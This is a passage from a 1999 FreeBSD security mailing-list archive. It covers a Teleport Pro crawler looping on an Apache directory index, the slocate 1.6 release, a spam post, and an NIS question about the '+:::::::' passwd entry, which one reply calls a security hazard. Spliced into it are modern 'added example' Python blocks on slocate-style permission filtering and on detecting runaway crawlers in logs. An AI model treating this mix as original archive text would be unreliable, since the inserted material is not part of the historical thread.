> server (at a rate of roughly one per second), repeatedly asking for the same
> (or similar) rubbish URL, as such ...
>
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M
>
> and a number of variations of this. All came from the same IP address.
>
> I have not used this software and am unaware of its abilities, but I am
> amazed that any responsible firm would distribute software that could be so
> easily abused in this way. What it is doing seems, to me, to be either a user
> doing something silly, or a bug in teleport pro (more likely the latter).
>
> Anyone seen this ?
>
> -- Chris

From owner-freebsd-security Fri Jun 4 15:41:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gulliver.net-one.it (gulliver.net-one.it [194.244.60.2]) by hub.freebsd.org (Postfix) with ESMTP id 8D8AC154A0 for ; Fri, 4 Jun 1999 15:41:46 -0700 (PDT) (envelope-from marcolin@net-one.it) Received: from python (python.net-one.it [194.244.60.148]) by gulliver.net-one.it (8.9.1a/8.9.1) with SMTP id AAA05171; Sat, 5 Jun 1999 00:40:00 -0100 (GMT) Message-Id: <4.1.19990605002350.0428cd30@pop-sa.net-one.it> X-Sender: marcolin@pop-sa.net-one.it X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 05 Jun 1999 00:41:10 +0200 To: "Chris"
From: Marco Pizzi Subject: Re: Net abuse/DOS with Teleport Pro ? Cc: freebsd-security@freebsd.org In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

>During two periods over two days, a person using an agent that identified
>itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web
>server (at a rate of roughly one per second), repeatedly asking for the same
>(or similar) rubbish URL, as such ...
>[cut]
>I have not used this software and am unaware of its abilities

Teleport Pro is a program like wget. Its main purpose is to download web-sites. I know that its limit is that it can launch up to 10 simultaneous threads. Teleport has many netiquette oriented options. Moreover it can impersonate another program, so you were lucky: the user didn't change this option..

Let me know if you want more information.

--
Marco Pizzi. (marcolin)
marcolin@net-one.it

From owner-freebsd-security Fri Jun 4 16:40: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 8ABCD1509E for ; Fri, 4 Jun 1999 16:39:52 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from rainbow5.scientia.demon.co.uk ([192.168.1.2] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.02 #1) id 10q1Nl-0005eQ-00; Fri, 04 Jun 1999 22:20:05 +0100 (envelope-from ben@rainbow5.scientia.demon.co.uk) Received: from rainbow5.scientia.demon.co.uk (ident=ben) by rainbow5.scientia.demon.co.uk with local (Exim 3.02 #1) id 10q1Ni-00061P-00; Fri, 04 Jun 1999 22:20:02 +0100 (envelope-from ben@rainbow5.scientia.demon.co.uk) Date: Fri, 4 Jun 1999 22:20:02 +0100
From: Ben Smithurst To: Chris Cc: security@FreeBSD.ORG Subject: Re: Net abuse/DOS with Teleport Pro ? Message-ID: <19990604222002.A23089@rainbow5.scientia.demon.co.uk> References: <199906041843.EAA08014@mail.aussie.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Chris wrote:

> During two periods over two days, a person using an agent that identified
> itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web
> server (at a rate of roughly one per second), repeatedly asking for the same
> (or similar) rubbish URL, as such ...
>
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M
>
> and a number of variations of this. All came from the same IP address.
>
> I have not used this software and am unaware of its abilities, but I am
> amazed that any responsible firm would distribute software that could be so
> easily abused in this way. What it is doing seems, to me, to be either a user
> doing something silly, or a bug in teleport pro (more likely the latter).

Teleport Pro is a program which fetches websites by following all links to a certain depth, for offline viewing. Looks like it got caught in one of Apache's directory indexes and got confused. I'd say it's a bug in Teleport Pro, not interpreting the links properly, and not any deliberate abuse.
--
Ben Smithurst
ben@scientia.demon.co.uk

From owner-freebsd-security Fri Jun 4 22: 2:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from bcgrizzly.com (bcgrizzly.com [207.34.136.10]) by hub.freebsd.org (Postfix) with SMTP id DC3F414F88 for ; Fri, 4 Jun 1999 22:02:57 -0700 (PDT) (envelope-from forger@bcgrizzly.com) Received: (qmail 15997 invoked from network); 5 Jun 1999 04:54:58 -0000 Received: from bcgrizzly.com (forger@207.34.136.10) by bcgrizzly.com with SMTP; 5 Jun 1999 04:54:58 -0000 Date: Fri, 4 Jun 1999 21:54:58 -0700 (PDT)
From: Brook Miles To: Chris Cc: "security@FreeBSD.ORG" Subject: Re: Net abuse/DOS with Teleport Pro ? In-Reply-To: <199906041843.EAA08014@mail.aussie.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Sat, 5 Jun 1999, Chris wrote:

> Upon processing my logs for the past few days, I noted an anomaly with regard
> to one particular directory. I checked out the logs manually.
>
> During two periods over two days, a person using an agent that identified
> itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web
> server (at a rate of roughly one per second), repeatedly asking for the same
> (or similar) rubbish URL, as such ...
>
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A
> /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M
>
> and a number of variations of this. All came from the same IP address.
>
> I have not used this software and am unaware of its abilities, but I am
> amazed that any responsible firm would distribute software that could be so
> easily abused in this way. What it is doing seems, to me, to be either a user
> doing something silly, or a bug in teleport pro (more likely the latter).
>
> Anyone seen this ?
>
> -- Chris

If you view the /Docs/ directory with a web-browser you will likely be presented with the directory listing and automatically generated links labeled "Name", "Last Modified" and so on above the columns...clicking on "Name" for example links to /Docs/?N=D which will give you the same list but sorted by name in descending order.

The websucker this person is using has put itself into a possibly infinite loop, recursively following the links to the same page...only sorted differently each time. Also it apparently doesn't properly understand relative URLs of the type "?N=A" as it is appending them each time instead of replacing them. This is something the vendor should seriously consider fixing.
Whoever is running the program should have imposed a limit on the depth of recursive retrievals or the number of pages it would download. This is definitely a very silly thing on the part of the user.

+---
| Brook Miles
| A spec of cosmic dust... with attitude.
+--------------------------------------

From owner-freebsd-security Sat Jun 5 5:17:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from baerenklau.de.freebsd.org (baerenklau.de.freebsd.org [195.185.195.14]) by hub.freebsd.org (Postfix) with ESMTP id 7BE2814FF0 for ; Sat, 5 Jun 1999 05:17:07 -0700 (PDT) (envelope-from w@panke.de.freebsd.org) Received: (from uucp@localhost) by baerenklau.de.freebsd.org (8.8.8/8.8.8) with UUCP id OAA24450; Sat, 5 Jun 1999 14:16:50 +0200 (CEST) (envelope-from w@panke.de.freebsd.org) Received: (from w@localhost) by paula.panke.de.freebsd.org (8.9.3/8.8.8) id NAA02480; Sat, 5 Jun 1999 13:45:02 +0200 (CEST) (envelope-from w) Message-ID: <19990605134502.43573@panke.de.freebsd.org> Date: Sat, 5 Jun 1999 13:45:02 +0200
From: Wolfram Schneider
To: Marco Pizzi , Chris
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Net abuse/DOS with Teleport Pro ?
References: <199906041843.EAA08014@mail.aussie.org> <4.1.19990605002350.0428cd30@pop-sa.net-one.it>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.89i
In-Reply-To: <4.1.19990605002350.0428cd30@pop-sa.net-one.it>; from Marco Pizzi on Sat, Jun 05, 1999 at 12:41:10AM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 1999-06-05 00:41:10 +0200, Marco Pizzi wrote:
> >During two periods over two days, a person using an agent that identified
> >itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web
> >server (at a rate of roughly one per second), repeatedly asking for the same
> >(or similar) rubbish URL, as such ...
> >[cut]
>
> >I have not used this software and am unaware of its abilities
>
> Teleport Pro is a program like wget.
> Its main purpose is to download web-sites.
> I know that its limit is that it can launch up to 10 simultaneous threads.
> Teleport has many netiquette oriented options.

like ignoring the /robots.txt file ;-((

Teleport is blacklisted for /cgi/ at www.freebsd.org

Wolfram

> Moreover it can impersonate another program, so you were lucky: the user
> didn't change this option..
> Let me know if you want more information.
--
Wolfram Schneider http://wolfram.schneider.org

From owner-freebsd-security Sat Jun 5 6:52:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ccia.cc (aic-gw.mlink.net [209.104.118.65]) by hub.freebsd.org (Postfix) with SMTP id 88DBD15183 for ; Sat, 5 Jun 1999 06:52:48 -0700 (PDT) (envelope-from matt@mlink.net)
Received: (qmail 6727 invoked by uid 1001); 5 Jun 1999 13:52:46 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 5 Jun 1999 13:52:46 -0000
Date: Sat, 5 Jun 1999 09:52:46 -0400 (EDT)
From: matt
To: FreeBSD-SECURITY
Subject: slocate v1.6
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks to Kevin Lindsay and his willingness to work with me. Secure Locate
v1.6 is now FreeBSD compatible =)  I originally worked up a patch for 1.5;
together we cleaned it all up and it was included in the 1.6 release.

For those who do not know what secure locate is, it is a replacement for
GNU locate, fixes many security problems and is faster (imho) than locate.
It also does not allow a user to see any files that they don't have
permission to read, ie; a user can't do "locate root" and see everything in
root's home dir.. or so on..

It installs the binary to /usr/bin, moves "locate" to locate.old then links
slocate to locate. It also places a link in /usr/libexec called "updatedb";
use this command from your cron scripts or whatnot to update the slocate
database which is stored in /var/db/slocate.

It can be downloaded from the following sites:

FTP: ftp.mkintraweb.com/pub/linux/slocate/
FTP2: ftp://ftp.fu-berlin.de/pub/unix/security/slocate/

I hope you find this of use =)

Matt

--
DISCLAIMER: Anyone sending me unsolicited commercial electronic mail will be
charged a $100 fee for time spent reading it. Do NOT send this type of
electronic mail to me. In reading this, you automatically agree to be
subjected to these terms: US Code Title 47, Sec.227(a)(2)(B), a
computer/modem/printer meets the definition of a telephone fax machine. By
Sec.227(b)(1)(C), it is unlawful to send any unsolicited advertisement to
such equipment. By Sec.227(b)(3)(C), a violation of the aforementioned
Section is punishable by action to recover actual monetary loss, or $500,
whichever is greater, for each violation.
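As an added illustration of the property matt describes above (a user cannot use the locate database to learn about files they could not reach on their own), here is a small model of that visibility check. It is not slocate's code and not part of the announcement: the file tree, uids, gids and mode bits are constructed for the demonstration, and the rule applied is the ordinary Unix one, search permission on every ancestor directory plus read permission on the parent, with uid 0 exempt as the kernel exempts it.

```python
"""Added example: the per-entry visibility rule a permission-aware locate
has to apply before showing a database hit. Tree, owners and modes below
are constructed; the rule is the standard Unix check, not slocate's code."""
import stat
from dataclasses import dataclass
from posixpath import dirname


@dataclass(frozen=True)
class User:
    uid: int
    gids: frozenset


@dataclass(frozen=True)
class Inode:
    uid: int
    gid: int
    mode: int          # permission bits only, e.g. 0o700


# Constructed stand-in for stat(2) on a small tree: every path the
# database would contain, with its owner, group and mode.
FS = {
    "/":                          Inode(0, 0, 0o755),
    "/root":                      Inode(0, 0, 0o700),
    "/root/notes.txt":            Inode(0, 0, 0o644),   # world-readable, but inside a 0700 dir
    "/root/.ssh":                 Inode(0, 0, 0o700),
    "/root/.ssh/authorized_keys": Inode(0, 0, 0o600),
    "/home":                      Inode(0, 0, 0o755),
    "/home/mike":                 Inode(1001, 1001, 0o755),
    "/home/mike/root-ca.pem":     Inode(1001, 1001, 0o644),
    "/home/kathleen":             Inode(1002, 1002, 0o750),  # only the group may enter
    "/home/kathleen/rootbeer.txt": Inode(1002, 1002, 0o644),
}


def allows(ino: Inode, user: User, owner_bit: int, group_bit: int, other_bit: int) -> bool:
    """Classic owner/group/other permission check; uid 0 bypasses it."""
    if user.uid == 0:
        return True
    if user.uid == ino.uid:
        return bool(ino.mode & owner_bit)
    if ino.gid in user.gids:
        return bool(ino.mode & group_bit)
    return bool(ino.mode & other_bit)


def ancestors(path: str) -> list:
    """Directories from the parent of `path` up to and including '/'."""
    dirs, d = [], dirname(path)
    while True:
        dirs.append(d)
        if d == "/":
            return dirs
        d = dirname(d)


def visible(path: str, fs: dict, user: User) -> bool:
    """A user may learn that `path` exists only if every ancestor directory
    grants search (x) and the parent grants read (r): exactly what listing
    the directory themselves would require."""
    for d in ancestors(path):
        ino = fs.get(d)
        if ino is None or not allows(ino, user, stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH):
            return False
    return allows(fs[dirname(path)], user, stat.S_IRUSR, stat.S_IRGRP, stat.S_IROTH)


def locate(pattern: str, fs: dict, user: User) -> list:
    """Substring match over the whole database, filtered by the caller's rights."""
    return sorted(p for p in fs if pattern in p and visible(p, fs, user))


if __name__ == "__main__":
    for who in (User(1001, frozenset({1001})), User(0, frozenset())):
        print(f"uid {who.uid} -> locate root:", locate("root", FS, who))
```

The filter runs at query time against the caller's uid and groups, so the database itself can be built with full privileges (the cron-driven updatedb the announcement mentions) and still hide entries from an unprivileged caller: "mike" sees that /root exists but nothing beneath it, and a world-readable file under a 0700 directory stays hidden because the directory, not the file, is what blocks the path.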
From owner-freebsd-security Sat Jun 5 6:56:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (Postfix) with ESMTP id 7594B14CE1 for ; Sat, 5 Jun 1999 06:56:53 -0700 (PDT) (envelope-from cconel@aussie.org)
Received: from frankenputer (dialup-b1-29.aussie.org [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id XAA09263 for ; Sat, 5 Jun 1999 23:56:50 +1000 (EST)
Message-Id: <199906051356.XAA09263@mail.aussie.org>
From: "Chris "
To: "freebsd-security@FreeBSD.ORG"
Date: Sat, 05 Jun 1999 23:57:51 +1000
Reply-To: "Chris"
X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;4)
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Net abuse/DOS with Teleport Pro ?
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 4 Jun 1999 21:54:58 -0700 (PDT), Brook Miles wrote:

>If you view the /Docs/ directory with a web-browser you will likely be
>presented with the directory listing and automatically generated links
>labeled "Name", "Last Modified" and so on above the columns...clicking on
>"Name" for example links to /Docs/?N=D which will give you the same list
>but sorted by name in descending order.

Aha ... now I know where the ?N=D and suchlike rubbish is coming from.

From what I can tell, then, Teleport Pro is evidently so bug-infested that
it can't tell its arse from its head. Or something like that. Sigh.

While I could just ban teleport pro agents from the site, then the users
would just tell it to impersonate something else. Sounds like I need to
think about writing an apache module that's smart enough to spot patterns
of abuse and cut them off (has anyone already done this?).

['Patterns of abuse'. Like automatically cutting off someone like the kind
user at fluke.com who recently decided to grab one of our entire sites,
along with about 2gb of image files, by setting up some software (unknown)
to make roughly 60 concurrent HTTP connections. The fluke folks told me
that they used NAT at their firewall and 'didn't keep logs', and so
couldn't reprimand the user responsible. Sigh.]
-- Chris

From owner-freebsd-security Sat Jun 5 16:44:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pokey.local.net (tcs4-58.arl.netwalk.net [216.69.200.250]) by hub.freebsd.org (Postfix) with ESMTP id 0B0CA151FE for ; Sat, 5 Jun 1999 16:44:36 -0700 (PDT) (envelope-from jmutter@netwalk.com)
Received: from insomnia.local.net (insomnia.local.net [192.168.2.3]) by pokey.local.net (8.9.2/8.9.2) with ESMTP id TAA08802 for ; Sat, 5 Jun 1999 19:44:33 -0400 (EDT) (envelope-from jmutter@insomnia.local.net)
Date: Sat, 5 Jun 1999 19:48:10 -0400 (EDT)
From: "James A. Mutter"
Reply-To: jmutter@netwalk.com
To: freebsd-security@freebsd.org
Subject: subscribe
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

subscribe jm7996@devrycols.edu

From owner-freebsd-security Sat Jun 5 16:46:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail1.noc.netcom.net (mail1.noc.netcom.net [204.31.1.150]) by hub.freebsd.org (Postfix) with ESMTP id 883A6150EA for ; Sat, 5 Jun 1999 16:46:58 -0700 (PDT) (envelope-from kprater@industrysearch.com)
Received: from webserver.industrysearch.com (webserver.industrysearch.com [207.95.128.10]) by mail1.noc.netcom.net (8.9.1/8.9.1/(NETCOM v2.00)) with ESMTP id QAA16034 for ; Sat, 5 Jun 1999 16:46:56 -0700 (PDT)
Message-Id: <199906052346.QAA16034@mail1.noc.netcom.net>
Received: from PB-S607 by webserver.industrysearch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1458.49) id L9MBWCXH; Sat, 5 Jun 1999 19:38:20 -0400
To: freebsd-security@FreeBSD.ORG
From: "Ken Prater, IndustrySearch.Com"
Date: Sat, 5 Jun 99 19:47:58 +0000
Subject: "Link Your Web Site" To IndustrySearch.Com
X-Mailer: WM - IndustrySearch.Com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Increase traffic to your company's web site with a FREE Hyperlink to
IndustrySearch.Com. Thousands of industrial purchasing agents, buyers,
engineers and others searching for suppliers and services can locate your
business easily with our USA Industrial Directory.

You can visit IndustrySearch.Com at http://industrysearch.com

"Link Your Web Site" to our USA Industrial Directory Data Base today!
Visit IndustrySearch.Com at http://industrysearch.com and click on "Link
Your Web Site"

Thank you,

K. Prater
USA INDUSTRIAL DATA BASE MANAGEMENT

To be removed from our mailing list, please click Reply and type "REMOVE"
in the subject field

From owner-freebsd-security Sat Jun 5 21:56:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jason.argos.org (a1-3b169.neo.rr.com [24.93.181.169]) by hub.freebsd.org (Postfix) with ESMTP id E770414E64 for ; Sat, 5 Jun 1999 21:56:13 -0700 (PDT) (envelope-from mike@argos.org)
Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA02831 for ; Sun, 6 Jun 1999 01:01:48 -0400
Date: Sun, 6 Jun 1999 01:01:48 -0400 (EDT)
From: Mike Nowlin
To: freebsd-security@freebsd.org
Subject: NIS strangeness
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If this has been answered, smack me and tell me where to find the answer --
I can't.....

Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all
the important stuff over, and ran into a problem with NIS:

As "mike" (my normal user) on the new box, "finger kathleen" works fine --
returns all the user data from the NIS server without any problems.

When "mike" is su'd "root", "finger kathleen" returns "no such user".

But when "mike" is su'd "root", "ypcat passwd" returns the full NIS password
file as it should.

Can't log in as "kathleen", either.

Is this something dumb I'm not noticing, or is it a "feature"?

Thanks --

Mike
mike@argos.org
mike@viewsnet.com

From owner-freebsd-security Sat Jun 5 22:25:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id C704914D10 for ; Sat, 5 Jun 1999 22:25:51 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA28347; Sat, 5 Jun 1999 23:25:42 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <375A0656.20DC59A7@softweyr.com>
Date: Sat, 05 Jun 1999 23:25:42 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Mike Nowlin
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: NIS strangeness
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mike Nowlin wrote:
>
> Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all
> the important stuff over, and ran into a problem with NIS:
>
> As "mike" (my normal user) on the new box, "finger kathleen" works fine --
> returns all the user data from the NIS server without any problems.

Did you add the +::::::: entry to the passwd file?

Be sure to do group as well, if that's the problem.  ;^)

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                  Softweyr LLC
http://www.softweyr.com/~softweyr           wes@softweyr.com

From owner-freebsd-security Sat Jun 5 22:29:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jason.argos.org (a1-3b169.neo.rr.com [24.93.181.169]) by hub.freebsd.org (Postfix) with ESMTP id 5C6AC14D10 for ; Sat, 5 Jun 1999 22:29:44 -0700 (PDT) (envelope-from mike@argos.org)
Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA02937; Sun, 6 Jun 1999 01:34:27 -0400
Date: Sun, 6 Jun 1999 01:34:26 -0400 (EDT)
From: Mike Nowlin
To: Wes Peters
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: NIS strangeness
In-Reply-To: <375A0656.20DC59A7@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>
> Did you add the +::::::: entry to the passwd file?
> Be sure to do group as well, if that's the problem. ;^)

Used "vipw" to add it into /etc/master.passwd, and /etc/passwd now has
+:*::::: in it..... Seems OK there..... :)

From owner-freebsd-security Sat Jun 5 23:24:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6708614CBE for ; Sat, 5 Jun 1999 23:24:18 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id AAA28437; Sun, 6 Jun 1999 00:24:13 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <375A140C.5ABCA08D@softweyr.com>
Date: Sun, 06 Jun 1999 00:24:12 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Mike Nowlin
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: NIS strangeness
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mike Nowlin wrote:
>
> >
> > Did you add the +::::::: entry to the passwd file?
> > Be sure to do group as well, if that's the problem. ;^)
>
> Used "vipw" to add it into /etc/master.passwd, and /etc/passwd now has
> +:*::::: in it..... Seems OK there..... :)

I'm not so sure about that *.

If "ypmatch -k username passwd" works, the network transport and NIS parts
are working just fine.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                  Softweyr LLC
http://www.softweyr.com/~softweyr           wes@softweyr.com

From owner-freebsd-security Sat Jun 5 23:35:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 69F4414BD0 for ; Sat, 5 Jun 1999 23:35:20 -0700 (PDT) (envelope-from ncb@zip.com.au)
Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id QAA05894; Sun, 6 Jun 1999 16:32:17 +1000
Date: Sun, 6 Jun 1999 16:32:17 +1000 (EST)
From: Nicholas Brawn
To: Wes Peters
Cc: Mike Nowlin , freebsd-security@FreeBSD.ORG
Subject: Re: NIS strangeness
In-Reply-To: <375A0656.20DC59A7@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 5 Jun 1999, Wes Peters wrote:

> Mike Nowlin wrote:
> >
> > Built a new 3.1-RELEASE machine to replace a 2.8-STABLE one -- moved all
> > the important stuff over, and ran into a problem with NIS:
> >
> > As "mike" (my normal user) on the new box, "finger kathleen" works fine --
> > returns all the user data from the NIS server without any problems.
>
> Did you add the +::::::: entry to the passwd file?
> Be sure to do group as well, if that's the problem. ;^)

Correct me if I'm wrong, but isn't that a security hazard?

Nick
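Returning to the Teleport Pro thread earlier on this page, two of its points lend themselves to a worked example: Brook Miles' explanation that a query-only link such as "?N=D" was being appended to the current URL instead of replacing its query, and Chris's wish for something that spots this kind of abuse pattern in the logs rather than banning an agent string the user can change. The following is an added example, not code from the list, from any poster, or from any vendor or project named in the thread. The host name, client addresses, agent string and log lines are constructed; the resolver contrasts RFC 3986 reference resolution (Python's urllib.parse.urljoin) with plain concatenation, and the log check flags a client that keeps hitting one path with a never-repeating, malformed query string.

```python
"""Added example: how a mis-resolved relative link produces the runaway
/Docs/?S=A?M=A?N=A... requests described in the thread, and a log check
that spots the resulting pattern. Host, addresses and log lines are
constructed for the demonstration."""
import re
from collections import defaultdict
from urllib.parse import urljoin, urlsplit

# The sort links an Apache-style directory listing offers above its columns.
SORT_LINKS = ("?N=A", "?N=D", "?S=A", "?S=D")


def resolve_correctly(base: str, ref: str) -> str:
    """RFC 3986 resolution: a query-only reference replaces the base's query."""
    return urljoin(base, ref)


def resolve_by_appending(base: str, ref: str) -> str:
    """The suspected websucker bug: the reference is glued onto the current URL."""
    return base + ref


def crawl(resolver, start: str, limit: int = 20) -> list:
    """Follow the sort links from `start`, never revisiting a URL, until nothing
    new appears or `limit` distinct URLs have been collected."""
    seen, queue = [start], [start]
    while queue:
        url = queue.pop(0)
        for ref in SORT_LINKS:
            nxt = resolver(url, ref)
            if nxt in seen:
                continue
            if len(seen) >= limit:      # only the broken resolver ever gets here
                return seen
            seen.append(nxt)
            queue.append(nxt)
    return seen


# Constructed Apache combined-format log: one client looping on /Docs/ with a
# growing query string, one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/1999:10:00:01 +1000] "GET /Docs/?N=A HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
203.0.113.7 - - [04/Jun/1999:10:00:02 +1000] "GET /Docs/?N=A?N=D HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
203.0.113.7 - - [04/Jun/1999:10:00:03 +1000] "GET /Docs/?N=A?N=D?S=A HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
198.51.100.9 - - [04/Jun/1999:10:00:03 +1000] "GET /Docs/index.html HTTP/1.0" 200 4096 "-" "Mozilla/4.5"
203.0.113.7 - - [04/Jun/1999:10:00:04 +1000] "GET /Docs/?N=A?N=D?S=A?S=D HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
203.0.113.7 - - [04/Jun/1999:10:00:05 +1000] "GET /Docs/?N=A?N=D?S=A?S=D?M=A HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
198.51.100.9 - - [04/Jun/1999:10:00:05 +1000] "GET /Docs/?N=D HTTP/1.0" 200 1200 "-" "Mozilla/4.5"
203.0.113.7 - - [04/Jun/1999:10:00:06 +1000] "GET /Docs/?N=A?N=D?S=A?S=D?M=A?N=A HTTP/1.0" 200 1200 "-" "Teleport Pro/1.26"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<agent>[^"]*)")?'
)


def find_runaway_clients(log_text: str, min_hits: int = 5) -> dict:
    """Group requests by (client, path). Flag a pair hit at least `min_hits`
    times without ever repeating a query string, and count how many of those
    queries are malformed (carry a second '?'), the fingerprint of a reference
    being appended rather than resolved. The agent string is reported but is
    not the test, since a user can change it."""
    stats = defaultdict(lambda: {"hits": 0, "queries": set(), "malformed": 0, "agent": ""})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        rec = stats[(m.group("ip"), parts.path)]
        rec["hits"] += 1
        rec["queries"].add(parts.query)
        if "?" in parts.query:           # urlsplit keeps later '?' characters in the query
            rec["malformed"] += 1
        rec["agent"] = m.group("agent") or ""
    return {
        key: rec for key, rec in stats.items()
        if rec["hits"] >= min_hits and len(rec["queries"]) == rec["hits"]
    }


if __name__ == "__main__":
    base = "http://www.example.org/Docs/"
    print(len(crawl(resolve_correctly, base)), "distinct URLs with correct resolution")
    print(len(crawl(resolve_by_appending, base)), "distinct URLs (capped) when appending")
    for (ip, path), rec in find_runaway_clients(SAMPLE_LOG).items():
        print(f"{ip} {path}: {rec['hits']} hits, {rec['malformed']} malformed queries, "
              f"agent {rec['agent']!r}")
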